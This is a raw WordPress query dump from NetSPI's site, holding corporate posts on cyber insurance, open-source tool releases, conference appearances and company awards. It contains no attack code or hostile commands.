Team NetSPI

More by Team NetSPI
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "91"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "91"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "91"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "91"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 
            [update_post_term_cache] => 1
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "91"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "91"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "91"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "91"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
			SELECT   wp_posts.*
			FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
			WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{b73288b88938eec2054d924b3c27d5edbf5ebcde61c7f46d478ba1637e9f4045}\"91\"{b73288b88938eec2054d924b3c27d5edbf5ebcde61c7f46d478ba1637e9f4045}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{b73288b88938eec2054d924b3c27d5edbf5ebcde61c7f46d478ba1637e9f4045}\"91\"{b73288b88938eec2054d924b3c27d5edbf5ebcde61c7f46d478ba1637e9f4045}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
			GROUP BY wp_posts.ID
			ORDER BY wp_posts.post_date DESC
			
		
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 28189
                    [post_author] => 91
                    [post_date] => 2022-08-09 09:00:00
                    [post_date_gmt] => 2022-08-09 14:00:00
                    [post_content] => 

It’s no secret that data breaches are costly. IBM’s annual Cost of a Data Breach report illustrates this well:  

  • The average cost of a data breach in 2021 was $4.35 million. 
  • The average cost of a ransomware attack, not including the cost of the ransom was $4.54 million in 2021.
  • 60 percent of organizations’ breaches led to increases in prices passed on to customers. 

Given the significant costs associated with data breaches, organizations are increasingly looking to cyber insurance to help protect their businesses against financial losses from a cyber attack. In fact, in IBM’s report, “insurance protection” was a key factor that lowered the average total cost of a data breach.  

Yet, cybersecurity insurance is still considered an emerging space, one that is notoriously difficult to navigate. 

For insights on the topic, we recently sat down with industry experts Ethan Harrington, Founder and Principal at 221b Consulting, and Mary Roop, Consultant at 221b Consulting, to discuss the current state of cyber insurance and get answers to some of our burning questions. Continue reading for highlights from the discussion.

What’s going on in the cyber insurance market? 

Ethan Harrington: The market is terrible, and many of the issues we've started to experience have surfaced just within the last few years. Last year was a historical year, and not for good reason. We saw a 300-plus percent increase in ransomware. We also saw our clients experience triple-digit increases in their cyber insurance premiums. 

On average, a company categorized as having "good" risk levels may see a 15 to 20 percent increase in premiums, and those at the "questionable" risk level or that have had claims experience may see another three-digit percentage increase. 

Why is this happening? Market corrections. The insurance marketplace is global, and all of these insurers are writing more than cyber coverage. When they have a year where auto liability coverage is bad, they're typically going to try to make up some of that premium in other places because they have to make money. In 2019 and during COVID-19, auto liability and general liability were extremely stressed, along with other claims completely unrelated to cyber. So, we knew that there was going to be a potential correction. 

But what we saw last year was a complete market shift. We’ve never seen anything like this before. We’re concerned that what we’re seeing right now is going to perpetuate for many more years and are unsure if coverages are ever going to return to what they were and how the associated premium will be impacted.  

As cyber insurance matures, is it becoming yet another regulation or standard to comply with? 

Ethan: Yes and no. Yes, because it is another party that is keenly interested in what organizations are doing to not only harden their defenses and protect their financials but also protect Personally Identifiable Information (PII) or data from a potential ransomware attack that could cause business interruption. 

No, because most insurance carriers understand that there are several golden standards to adhere to, whether it's the National Institute of Standards and Technology (NIST) or the International Organization for Standardization (ISO). If you can document that you follow one or a combination of them, then I think that most would understand it. 

Insurers are starting to layer on more requirements beyond what NIST or ISO would indicate as guidance – and they’re asking questions specific to CISOs. They're starting to ask questions about cyber resiliency. In general, most regulatory frameworks that organizations follow focus on preventative actions. Now, carriers are focusing on reactive responses to cyber attacks, looking at what you are doing to limit the potential impact if you do have to file a claim. 

There’s more scrutiny involved in cyber insurance today, and it's different from what other regulators require.  

Who typically manages the cyber insurance process? 

According to the webinar attendees, here is the breakdown of how cyber insurance is managed at their respective organizations, many of which came from financial institutions: 

  • 42% risk management  
  • 25% finance 
  • 25% information security  
  • 8% general counsel/legal 

Mary Roop: Whoever runs risk management typically controls the placement, but it truly is a partnership between the person responsible for placing the insurance policies, the information security team, the privacy team within legal, and the team responsible for Payment Card Insurance (PCI) compliance.  

These teams need to work together to ensure an understanding of the cyber hygiene and the data incident response within your organization. This creates a holistic picture with complete information useful in the robust cyber insurance application and underwriting process. 

How has ransomware played a role in the cyber insurance market?  

Ethan: Ransomware decimated the entire insurance industry from a cyber perspective. In 2021, there was a 300-plus percent increase in ransomware attacks. Ransomware used to be a quick way for adversaries to grab cash, but they've become more intelligent, conducting background checks into businesses to determine what their financials look like to identify the most realistic ransom amount to ask for. 

Ransomware is not going away anytime soon, and the cyber insurance market is responding to that. Now, we are starting to see sub-limits within insurance policies specific to ransomware, separate retentions as it applies to ransomware, and different changes in waiting periods (eight hours then vs. 24-48 hours now). But I expect that'll start to lessen, and some of those policies will return to what they were before. 

Want to improve your ransomware prevention and detection? Explore NetSPI’s ransomware attack simulation services. 

How have cybersecurity insurance questionnaires evolved? 

Ethan: 15 years ago, none of the insurers had any expertise in cybersecurity. Many insurance companies recognized that they do not understand cybersecurity and hired third parties to come in and ask the questions on their behalf.  

That has changed. Lots of insurance carriers are now hiring specific technical people that have been consultants in cyberspace or those who managed security service providers because they understand the market much better. Now, insurance companies are teaching them insurance and how to do underwriting versus outsourcing. 

How do you navigate situations where providers require specific vendors for your solutions and controls? 

Mary: If your cyber insurance carrier isn't already requesting this within the application, we do recommend getting pre-approval on your data incident providers. They may be included on that pre-approved list already, and if not, they're going to have to be vetted extensively by those providers.  

This process is lengthy, but it is important to undertake before starting your renewal strategy. Go meet up with your legal team to determine the outside counsel that you can use to help advocate for your vendor choices. Carriers want to understand vendor credibility if they're not familiar with them. 

Getting ahead of this process is important because you don't want any surprises when a data incident occurs. Like when your carrier says, "We're not going to approve this claim because you do not use an approved vendor." If you are proactive about this, you can go to the leaders of the respective departments and come up with a solution before it's too late. 

There has been talk about possibly monitoring clients’ cyber behavior and adjusting insurance premiums accordingly. How might we see a program like this play out? 

Ethan: We don’t like insurance companies constantly monitoring and doing scans of environments. It looks bad for the insurance industry because we all know that there's going to be weaknesses that can be found if you look close enough.  

If an insurance company is constantly scanning your system, it is possible that they're going to come back to you and say, “We need you to fix this.” At some point, the CISO is going to say, “I don't have any more risk management practices that I can apply to protect us against that.” Security teams can do everything they can, but if employees/personnel make a negligent mistake or are heavily targeted, they can cause a massive claim to occur. 

We’re putting the CISO in a difficult position where they’re trying to manage the board, protect their critical assets, and now all of a sudden, they also need to keep an insurance company happy.  

Some scans delve into the depths of systems to find vendors and clients that you've referenced and how they could affect your insurance. Underwriters, especially in financial services, are looking at the kind of brand reputation or loss of business income that might be impacted if there was a data security incident. It's becoming exceedingly difficult for underwriters to try to figure this out. 

Have you seen any companies go under because they've failed to secure cyber insurance due to poor IT security controls? 

Ethan: Thus far, no, I have not seen anybody that has actually gone under because they didn't buy cyber insurance. But I anticipate it is going to happen, especially with the triple-digit increases in premiums. 

We are seeing more and more companies that are not buying or cannot obtain cyber insurance, and it will come back to bite them in some capacity. It's likely that we will see organizations going under as a result of the rising financial costs associated with breaches today. 

For the full conversation and more in-depth insights from Ethan, Mary, and Norman, watch the on-demand webinar.

[post_title] => The Current State of Cyber Insurance [post_excerpt] => Get answers to your cybersecurity insurance questions with industry experts Ethan Harrington and Mary Roop from 221b Consulting. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => state-of-cyber-insurance [to_ping] => [pinged] => [post_modified] => 2022-08-05 17:48:57 [post_modified_gmt] => 2022-08-05 22:48:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28189 [menu_order] => 7 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 28157 [post_author] => 91 [post_date] => 2022-08-09 09:00:00 [post_date_gmt] => 2022-08-09 14:00:00 [post_content] =>
The tools help defense teams discover vulnerable network shares and identify adversary behaviors.

Minneapolis, MN NetSPI, the leader in enterprise penetration testing and attack surface management, today unveiled two new open-source tools for the information security community: PowerHuntShares and PowerHunt

These new adversary simulation tools were developed by NetSPI’s Senior Director, Scott Sutherland, to help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections. 

  • PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. This capability helps address the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments. 
  • PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. PowerHunt automates the collection of artifacts at scale using PowerShell remoting and perform initial analysis. It can also output easy to consume .csv files so that additional triage and analysis can be done using other tools and processes. 

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.” 

To see PowerHuntShares in action and explore the risks of excessive share permissions, read Scott’s blog, or register for our upcoming webinar, How to Evaluate Active Directory SMB Shares at Scale. For those attending Black Hat on August 10-11, request a meeting with Scott at NetSPI booth #1687. 

NetSPI’s global penetration testing team has developed several open-source tools, including popular penetration testing tools PowerUpSQL and MicroBurst. Learn more about NetSPI’s commitment to open-source tool development on the company’s tool repository

About NetSPI  

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over one million assets to find four million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.  

Media Contacts: 
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277  

Inkhouse for NetSPI 
netspi@inkhouse.com
(774) 451-5142 

[post_title] => NetSPI Releases Two Open-Source Tools for the Information Security Community [post_excerpt] => Learn how the adversary simulation tools can help defense teams discover vulnerable network shares and improve detections. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => adversary-simulation-open-source-tools [to_ping] => [pinged] => [post_modified] => 2022-08-05 11:19:32 [post_modified_gmt] => 2022-08-05 16:19:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28157 [menu_order] => 8 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 28162 [post_author] => 91 [post_date] => 2022-08-04 09:52:40 [post_date_gmt] => 2022-08-04 14:52:40 [post_content] =>

Minneapolis, MinnesotaNetSPI is a market leader in penetration testing and attack surface management, and today it has been named a Sample Vendor for Pentesting as a Service (PTaaS) in the 2022 Gartner® Hype Cycle for Security Operations (SecOps)

This Gartner’s Hype Cycle SecOps includes entries across the SecOps space that “aim to help security and risk management leaders strategize and deliver effective response and remediation.”  

We believe our inclusion in this year’s report validates NetSPI’s PTaaS model.

The core benefits of NetSPI's Resolve™ platform in three core areas include: 

  • Hybrid automated and manual testing approach: NetSPI leverages a combination of automation and human pentesters to increase the efficiency and effectiveness of the results. With automation, NetSPI alleviates many of the mundane vulnerability management tasks for organizations—enabling more manual pentesting to find and fix business-critical vulnerabilities. 
  • Real-time validation and faster remediation: NetSPI’s PTaaS model delivers a platform that enables faster scheduling and execution, and real-time communications with testers and visibility of test results. By providing access to real-time findings, NetSPI enables earlier remediation of vulnerabilities. 
  • Support for teams with limited in-house security experts: NetSPI provides customized and tailored guidance throughout the life cycle of each assessment to support internal teams facing the pressures of the security skill gap.  

“To us, this acknowledgment by Gartner further cements our approach to delivering innovative vulnerability and risk management solutions to today’s top enterprises,” said Travis Hoyt, CTO at NetSPI. “Traditional penetration testing is dead. PTaaS allows organizations to remediate faster, receive support from expert pentesters, and implement a strategic approach to offensive security.” 

According to Gartner, “the adoption of remote work, and increased use of mobile devices and cloud services have not slowed over the last 12 months. This has led to expanded requirements for organizations to track risk and threats to a wider set of digital assets. With the expansion of digital business functions and third-party-managed assets, security and risk management leaders must reevaluate how their business-critical environments change security strategy and tooling.” The report also mentions that “pentesting is foundational in a security program and mandated by various compliance standards. PTaaS enables organizations to elevate their security posture through continual assessment, and integrates validation earlier in the AppDev cycle by giving access to real-time findings delivered through the platform, therefore enabling faster treatment of vulnerabilities.” 

Learn more about NetSPI’s PTaaS solutions here.

Gartner, Hype Cycle for Security Operations, 2022, Andrew Davies, 5 July, 2022.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. GARTNER and HYPE CYCLE are the registered trademarks of Gartner Inc., and/or its affiliates in the U.S and/or internationally and have been used herein with permission. All rights reserved.

About NetSPI 

NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn. 

Media Contacts:
Tori Norris, NetSPI
victoria.norris@netspi.com
630) 258-0277

Inkhouse for NetSPI
netspi@inkhouse.com

[post_title] => NetSPI Recognized in the 2022 Gartner® Hype Cycle for Security Operations [post_excerpt] => Learn why NetSPI was recognized by Gartner for its innovations in Penetration Testing as a Service (PTaaS). [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gartner-hype-cycle-security-operations-2022 [to_ping] => [pinged] => [post_modified] => 2022-08-11 10:22:44 [post_modified_gmt] => 2022-08-11 15:22:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28162 [menu_order] => 11 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 28141 [post_author] => 91 [post_date] => 2022-08-03 10:01:48 [post_date_gmt] => 2022-08-03 15:01:48 [post_content] =>
Penetration Testing as a Service (PTaaS) leader marks its presence with various speaking sessions, open source tool releases, and a happy hour event during this year’s Black Hat and DEF CON conferences.

Minneapolis, MN and Las VegasNetSPI, the leader in enterprise security testing and attack surface management, will be participating in several speaking sessions and activities during Black Hat 2022 and DEF CON, taking place at the Mandalay Bay Expo Hall in Las Vegas starting on August 30. NetSPI is located at Booth #1687 on the Mandalay Bay Trade Floor. 

With over 20 years of experience, NetSPI’s team of over 200 global pentesters are highly-skilled in manual pentesting and laser-focused on excellence. During the events, these company experts will inform attendees on the vulnerabilities and escalating threats targeting enterprises, as well as share insights on how businesses can mature their security programs and empower their workforces.  

NetSPI speaking sessions during Black Hat and DEF CON include: 

  • On August 10 at 10:20am PT, Nick Landers, Director of Research at NetSPI, will present at Black Hat alongside James Forshaw, Security Researcher at Google Project Zero, in a talk titled: “Elevating Kerberos to the Next Level.” In this talk, Nick and James will conduct a deep dive into the inner workings of Kerberos as it applies to local authentication and some of the unusual behaviors to be found within. They will also describe the Kerberos security issues they’ve discovered, including authentication bypasses, sandbox escapes and arbitrary code execution in privileged processes.
  • On August 12 at 10:10am PT, Karl Fosaaen, Senior Director at NetSPI, will present at the DEF CON Cloud Village in a talk titled: “Automating Insecurity in Azure.” In this talk, Karl will go over how Automation Accounts function within Azure, how attackers can abuse built-in functionality to gain access to credentials, privileged identities, and sensitive information, and present a deep dive on four vulnerabilities from the last year that all apply to Azure Automation Accounts.
  • On August 12 and 13, Melissa Miller, Managing Security Consultant at NetSPI will present at the DEF CON Girls Hack Village.
    • On August 12 at 5pm PT Imposter Syndrome: The Silent Killer of Motivation, Melissa will discuss the characteristics of a healthy work environment and steps towards updating your environment to make it right for you, along with—how to realistically identify your strengths and weaknesses and use that information to pursue and achieve your career goals.
    • On August 13 at 1:30pm PT at the Hacking Diversity panel, Melissa will  discuss how the industry can increase diversity in cybersecurity. 

During Black Hat, Scott Sutherland, Senior Director at NetSPI, will be revealing two new open source tools for security operations centers. The new tools are designed to help teams hunt for artifacts and anomalies associated with common “known bad” behaviors, and help teams inventory, naturally group, and prioritize the triage/remediation of excessive privileges assigned to SMB shares hosted across Active Directory computers. 

For more information or to book a meeting with one of NetSPI’s experts at Black Hat or DEF CON, please click here

You can also join NetSPI for their Black Hat happy hour co-hosted by Adaptive Shield, and Armis on August 10 at 5 PM PT at the Foundation Room Las Vegas, located on the 63rd floor of Mandalay Bay. Register your spot today.

About NetSPI 

NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn

Media Contact:
Inkhouse for NetSPI
netspi@inkhouse.com

[post_title] => Media Alert: NetSPI at Black Hat 2022 and DEF CON 30 [post_excerpt] => Connect with NetSPI’s expert offensive security team during Black Hat 2022 and DEF CON 30 during their speaking sessions, happy hour, or at the NetSPI booth. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => black-hat-2022-def-con-30 [to_ping] => [pinged] => [post_modified] => 2022-08-03 15:35:29 [post_modified_gmt] => 2022-08-03 20:35:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28141 [menu_order] => 12 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 27963 [post_author] => 91 [post_date] => 2022-06-21 03:00:00 [post_date_gmt] => 2022-06-21 08:00:00 [post_content] =>
Security industry leaders join NetSPI’s EMEA team to fuel growth and meet increased demand for pentesting services in EMEA.

Minneapolis, MNNetSPI, the leader in enterprise penetration testing and attack surface management, today announced the expansion of its global footprint in Europe, Middle East, and Africa (EMEA) to meet growing international demand for its offensive security solutions.  

“NetSPI’s technology-powered services and customer-first focus has solidified the company’s leading position within the North American offensive security industry,” said KKR’s Paul Harragan, a London-based investor in NetSPI. “The team’s specialised skill set, tech acumen and white glove delivery model will resonate with the European market and should drive continued growth and expansion as the team develops and delivers critical offensive security solutions.” 

“We’ve experienced a record volume of demand from EMEA organisations needing to improve their security posture through a proven, holistic approach to pentesting, and now, we’re well positioned to deliver this in the region,” said Aaron Shilts, CEO, NetSPI. “We’ve hired a team of extremely talented, energising security leaders who align with our customer-first approach to business. Establishing our EMEA beachhead with this incredible group will ensure NetSPI is destined for accelerated growth and continued success in the region.” 

The company has appointed security industry veterans Steve Bakewell, Steve Armstrong, and Eric Graves to strategically lead NetSPI’s EMEA team and drive further growth in the region. Bakewell joins NetSPI as Managing Director of EMEA and brings over 23 years of experience in cybersecurity and risk management across organisations including Central Government & Defence and Royal Bank of Scotland, as well as with security vendors such as CipherCloud, RiskIQ and Citrix. 

“The pentesting space is highly competitive in the UK, but vendors in the region simply do not have the pedigree that NetSPI has,” Bakewell said. “NetSPI already provides its penetration testing services to nine out of the top 10 U.S. banks and many of the Fortune 500 – I’m looking forward to the opportunity to serve end users in EMEA during a time when security is high on the business agenda.” 

Bakewell will work closely with Armstrong, who has been appointed Regional Vice President for EMEA. Armstrong has two decades of experience in sales and security, spanning companies including Bitglass, CyCognito and Avira. Graves will work alongside Armstrong as NetSPI’s Regional Sales Director for EMEA, leveraging his extensive experience in cybersecurity sales for organisations such as Pentera, TrendMicro and Spok, to meet global demand and provide NetSPI’s award-winning pentesting solutions to EMEA customers. The three leaders will work closely alongside Shilts and oversee NetSPI’s growing team in EMEA. 

NetSPI will be at InfoSecurity Europe from June 21-23, 2022 at ExCel London. Participate in a live demo and meet the company’s security experts at Stand M-12. For more information or to schedule a meeting with NetSPI at InfoSecurity Europe, please click here.

 

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277 

Jessica Bettencourt, Inkhouse for NetSPI  
netspi@inkhouse.com
(774) 451-5142

[post_title] => NetSPI Expands Global Footprint with Strategic Leadership Appointments in EMEA [post_excerpt] => Read about NetSPI’s expansion into the EMEA region to meet increased demand for strategic penetration testing services. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-emea-expansion [to_ping] => [pinged] => [post_modified] => 2022-06-17 16:43:03 [post_modified_gmt] => 2022-06-17 21:43:03 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27963 [menu_order] => 25 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 27956 [post_author] => 91 [post_date] => 2022-06-17 15:01:02 [post_date_gmt] => 2022-06-17 20:01:02 [post_content] =>
The company is recognized for its innovation, culture, and leadership by The Star Tribune and the Top Workplaces Program.

Minneapolis, MNNetSPI, the leader in penetration testing and attack surface management, recently won two Top Workplaces awards – Top 200 Workplaces in Minnesota and the Cultural Excellence Awards – recognizing the company’s forward-looking innovation, team-first culture, and dedicated leadership team.  

Top Workplaces recognizes the most progressive companies in Minnesota based on employee opinions, measuring engagement, organizational health, and satisfaction, and the Cultural Excellence Awards highlight the company’s advancement in three key areas: 

  • Innovation: Celebrates organizations who have embedded innovation into their culture and create an environment where new ideas come from all employees.
  • Purpose & Values: Celebrates organizations who have both embedded their mission and values into their culture and are efficient in their work to bring it into reality.
  • Leadership: Celebrates organizations whose leaders inspire confidence in their employees and in the direction of the company.  

“We prioritize fostering an environment that ensures every team member feels valued, heard, and supported,” said Heather Crosley, Director of People Operations at NetSPI. “These two recognitions prove that our dedication to our culture is resonating across our workforce, and I want to thank our team for making NetSPI a great place to work.” 

These recognitions come during a year of rapid growth and innovation for NetSPI, as the company brought on more than 90 new employees this year already. NetSPI’s strong recruiting and retention initiatives and flexible company culture drive the development of new mission-critical services, with the company recently announcing the launch of its new attack surface management service, as well as enhancements to its breach & attack simulation offering. NetSPI is also expanding its global presence, building on its current momentum to serve the EMEA region.  

“Retaining top talent is more important than ever in today’s evolving cybersecurity threat environment,” said Aaron Shilts, CEO of NetSPI. “Our workforce consistently exceeds expectations, and our team-first culture is a driving force of that success. We are honored to be recognized by the Star Tribune and Top Workplaces.” 

The results of the Star Tribune Top Workplaces are based on survey information collected by Energage, an independent company specializing in employee engagement and retention. The analysis includes responses from employees at Minnesota public, private, and nonprofit organizations. Earlier this year, NetSPI was recognized as a 2022 National Top Workplace

NetSPI is hiring. Visit www.netspi.com/careers to view open roles and apply.

  

About NetSPI 

NetSPI is the leader in penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277 

Inkhouse for NetSPI 
netspi@inkhouse.com

[post_title] => NetSPI Named a Top Minnesota Workplace and Honored for its Cultural Excellence [post_excerpt] => Learn what makes NetSPI a Top Workplace in Minnesota and a leader in cultural excellence. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => top-200-minnesota-workplaces [to_ping] => [pinged] => [post_modified] => 2022-06-17 15:52:07 [post_modified_gmt] => 2022-06-17 20:52:07 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27956 [menu_order] => 29 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 27877 [post_author] => 91 [post_date] => 2022-06-07 08:00:00 [post_date_gmt] => 2022-06-07 13:00:00 [post_content] =>

The RSA Conference is one of the largest cybersecurity events in the world, offering a multitude of opportunities for members of the cybersecurity community to gain valuable insights and network with one another. And this week, the NetSPI team packed their bags and flew out to San Francisco for the conference after a two-year hiatus. 

Not only is this a big week for the cybersecurity industry, but also for team NetSPI as we take home the Global InfoSec Award for “Most Innovative in Penetration Testing.” Prior to their arrival at RSA, we asked our team to answer a few questions: 

  1. What are you looking forward to most during the 2022 RSA Conference?
  2. What does NetSPI’s recognition as “Most Innovative in Penetration Testing” mean to you and what do you think makes NetSPI the most innovative pentesting company? 

Continue reading for responses from our product, services, and sales leadership – all of which were clearly excited to see many of our clients and customers in-person.

What are you looking forward to most during the 2022 RSA Conference?  

Cody Chamberlain, Head of Product  

“The security community isn’t very large and bringing everyone together is extremely valuable. This is an opportunity for connecting, sharing stories, and further building relationships across companies. 

Talking with clients and prospects about the NetSPI story is the most exciting thing for me. We are in a unique position in the market with our combination of industry-leading talent and technology and I’m excited to share that with people at the conference, especially those unaware of us.” 

Charles Horton, Chief Operating Officer 

“The RSA Conference has always had an impressive lineup of speakers and sessions. Having a hiatus like many conferences have had, I think there will be a tremendous amount of energy coming into the conference as people are eager to collaborate in person with clients, colleagues, and vendors. As the landscape continues to move and shift, and clients go through different investment levels and cycles of their security programs, it is an opportune time to evaluate who and where they are investing their dollars given the number of sponsor organizations at the event.”

Chad Peterson, Managing Director  

“I am most excited about getting the opportunity to speak with our clients and industry face-to-face again. Any time we have the chance to interact in person, it always seems to foster great conversations and thought leadership. 

